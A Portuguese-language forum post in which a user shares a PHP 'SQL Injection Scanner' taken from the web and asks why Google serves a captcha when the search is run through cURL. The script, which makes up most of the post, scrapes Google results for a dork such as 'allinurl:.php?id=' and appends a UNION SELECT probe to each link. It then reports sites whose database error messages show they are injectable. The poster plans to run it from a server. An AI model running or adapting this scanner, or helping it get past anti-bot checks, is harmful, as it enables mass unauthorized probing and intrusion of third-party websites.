Tweet
Fala pessoal,
Peguei um scanner na net. Tive que fazer algumas modificações para funcionar.
Agora surgiu um problema, se eu executo a url (da busca do google) no pc funciona, porém, quando chamo via php (curl) aparece uma página do google pedindo para preencher um captcha (para verificar se não é um robô).
Por que isso ocorre somente quando é chamado via php (Curl), sendo que, o IP é o mesmo?
Só estou testando no meu pc; pretendo hospedar em um servidor, já que o link do servidor é melhor e possui outras vantagens.
Segue o Scanner para quem quiser:
Obs: Não sei se postei minha dúvida na categoria correta, caso não esteja, perdoe-me; primeiro post, ainda estou meio perdido. hehe
Peguei um scanner na net. Tive que fazer algumas modificações para funcionar.
Agora surgiu um problema, se eu executo a url (da busca do google) no pc funciona, porém, quando chamo via php (curl) aparece uma página do google pedindo para preencher um captcha (para verificar se não é um robô).
Por que isso ocorre somente quando é chamado via php (Curl), sendo que, o IP é o mesmo?
Só estou testando no meu pc; pretendo hospedar em um servidor, já que o link do servidor é melhor e possui outras vantagens.
Segue o Scanner para quem quiser:
Código:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Pink Hat SQL Injection Scanner by fvox</title>
<style type="text/css">
<!--
.style1 {color: #808080}
.style2 {color: #000000; font-weight: bold;}
-->
</style>
</head>
<body class="style1">
<center></center>
<form id="scan" name="scan" method="post" action="">
<center><tt>Dork:</tt>
<input name="dork" type="text" value="allinurl:.php?id=" />
<label>
<input type="submit" name="Submit" value="Scan" />
</label>
</form>
</body>
</html>
<?php
/* SQL Injection Scanner 0.1
by fvox of Pink Hat
Contato: synyster@bsdmail.com */
set_time_limit(0);
ini_set("max_execution_time", 99999999);
if(!extension_loaded('php_curl') && !extension_loaded('curl'))
if(!dl('php_curl.so') && !dl('php_curl.dll')) die("Enable cURL extension!");
class Scanner
{
public function main(){
if(!isset($_POST['dork'])) die;
$google = $this->cURL("http://www.google.com.br/search?q=".$_POST['dork']."&num=100");
$search = $google[0];
$search .= $google[1];
$links = $this->getLinks($search);
$scan = $this->cURL($links[1]);
foreach($links[1] as $link){
$link .= "+and+0=1+union+select+";
$syn = $this->cURL($link);
$syn = $syn[0];
if($this->scan($syn)){
echo "<span class='style2'>Site vuln: </span>$link
";
flush();
}
}
}
private function scan($site){
if(preg_match("/(ODBC SQL Server Driver|SQL syntax error|mysql_num_rows\(\)|mysql_fetch_array\(\))/i", $site)) return true;
}
private function getLinks($url){
preg_match_all('/<li class="g"><h3 class="r"><a href="([^"]+)/i', $url, $links);
return $links;
}
private function cURL($url){
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_ENCODING,"gzip,deflate");
$return = curl_exec($ch);
//$headerSent = curl_errno($ch);
curl_close($ch);
return $return;
}
}
$synyster = new Scanner;
$synyster->main();
?>
hp?cod= site:Apenas usuários registrados e ativados podem ver os links.,
Comment